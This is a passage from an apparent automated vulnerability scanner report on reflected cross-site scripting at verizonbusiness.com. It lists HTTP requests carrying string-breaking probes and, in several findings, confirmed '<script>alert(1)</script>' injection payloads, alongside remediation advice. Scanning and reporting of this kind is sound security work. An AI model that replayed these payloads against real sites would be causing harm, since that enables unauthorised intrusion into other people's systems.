hbx.mlc="/error/resourcesd0e32";71ce5c2352a/1002a2a12-111-VoIP.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.590. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a12-111-VoIP.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bcdc'%3b898de890ade was submitted in the REST URL parameter 1. This input was echoed as 4bcdc';898de890ade in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources4bcdc'%3b898de890ade/1002a2a12-111-VoIP.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources4bcdc';898de890ade/1002a2a12-111-VoIP.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.591. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a12-111-VoIP.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88ad8'%3b7d9ffc4c1a2 was submitted in the REST URL parameter 2. This input was echoed as 88ad8';7d9ffc4c1a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/88ad8'%3b7d9ffc4c1a2 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/88ad8';7d9ffc4c1a2'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.592. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a12-111-VoIP.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8961</script><script>alert(1)</script>fe4355bb8c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a12-111-VoIP.xmlb8961</script><script>alert(1)</script>fe4355bb8c8 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "49bf21736d37ff264b48c69f56996fbf"
Last-Modified: Wed, 17 Nov 2010 00:29:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d76e6e9e5-622c-434e-8229-e361097b1df6|VTID%3d4a709456-7b11-4a39-83a6-7bb46b0b4b0c|SX%3d1289954941|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:32:45 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:29:02 GMT
Content-Length: 48082

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a2a12-111-VoIP.xmlb8961</script><script>alert(1)</script>fe4355bb8c8</url>
...[SNIP]...

1.593. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a13-111-Application+&+Performance+Management.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b936'%3b996ea946b26 was submitted in the REST URL parameter 1. This input was echoed as 7b936';996ea946b26 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7b936'%3b996ea946b26/1002a2a13-111-Application+&+Performance+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40710
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources7b936';996ea946b26/1002a2a13-111-Application+&+Performance+Management.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.594. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a13-111-Application+&+Performance+Management.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f8de"%3b26c0eb8eaf2 was submitted in the REST URL parameter 1. This input was echoed as 7f8de";26c0eb8eaf2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7f8de"%3b26c0eb8eaf2/1002a2a13-111-Application+&+Performance+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40710
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources7f8de";26c0eb8eaf2/1002a2a13-111-Application+&+Performance+Management.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FO
...[SNIP]...

1.595. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a13-111-Application+&+Performance+Management.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57eda'%3b26b0237444b was submitted in the REST URL parameter 2. This input was echoed as 57eda';26b0237444b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/57eda'%3b26b0237444b&+Performance+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40266
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/57eda';26b0237444b&+Performance+Management.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.596. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a13-111-Application+&+Performance+Management.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2ba0</script><script>alert(1)</script>81f5566ffef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a13-111-Application+f2ba0</script><script>alert(1)</script>81f5566ffef&+Performance+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "c9d77aa89ef728d89e3cbda025e31a40"
Last-Modified: Wed, 17 Nov 2010 00:21:45 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:46 GMT
Connection: close
Connection: Transfer-Encoding
Expires: Mon, 16 Nov 2009 18:21:45 GMT
Content-Length: 35047

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a2a13-111-Application+f2ba0</script><script>alert(1)</script>81f5566ffef&+Performance+Management.xml</url>
...[SNIP]...

1.597. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84dc8'%3b8bffbc74894 was submitted in the REST URL parameter 1. This input was echoed as 84dc8';8bffbc74894 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources84dc8'%3b8bffbc74894/1002a2a14-111-Unified+Communications+and+Collaboration.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40716
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources84dc8';8bffbc74894/1002a2a14-111-Unified+Communications+and+Collaboration.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.598. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0a2c"%3b4c08c3bf546 was submitted in the REST URL parameter 1. This input was echoed as d0a2c";4c08c3bf546 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd0a2c"%3b4c08c3bf546/1002a2a14-111-Unified+Communications+and+Collaboration.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:07 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40716
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesd0a2c";4c08c3bf546/1002a2a14-111-Unified+Communications+and+Collaboration.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";
...[SNIP]...

1.599. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a467</script><script>alert(1)</script>a526a97ff5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml7a467</script><script>alert(1)</script>a526a97ff5a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "f57d65d01d8cd8d53f0948bd5d4ad643"
Last-Modified: Wed, 17 Nov 2010 00:28:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:28:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d2e7dd086-d2e3-43ec-bead-64b4fe33ad4a|VTID%3d75bd7864-a556-4c6f-9d37-4ca4903fa3e4|SX%3d1289954888|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:31:52 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:28:09 GMT
Content-Length: 53126

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml7a467</script><script>alert(1)</script>a526a97ff5a</url>
...[SNIP]...

1.600. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fab23'%3bfab3e9da16d was submitted in the REST URL parameter 2. This input was echoed as fab23';fab3e9da16d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/fab23'%3bfab3e9da16d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/fab23';fab3e9da16d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.601. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a15-111-Connecting+Business+Information.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e29"%3bc69daeaea42 was submitted in the REST URL parameter 1. This input was echoed as 37e29";c69daeaea42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources37e29"%3bc69daeaea42/1002a2a15-111-Connecting+Business+Information.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:19:50 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40698
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources37e29";c69daeaea42/1002a2a15-111-Connecting+Business+Information.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VA
...[SNIP]...

1.602. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a15-111-Connecting+Business+Information.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15d90'%3b68b20facfe5 was submitted in the REST URL parameter 1. This input was echoed as 15d90';68b20facfe5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources15d90'%3b68b20facfe5/1002a2a15-111-Connecting+Business+Information.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40698
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:07 GMT

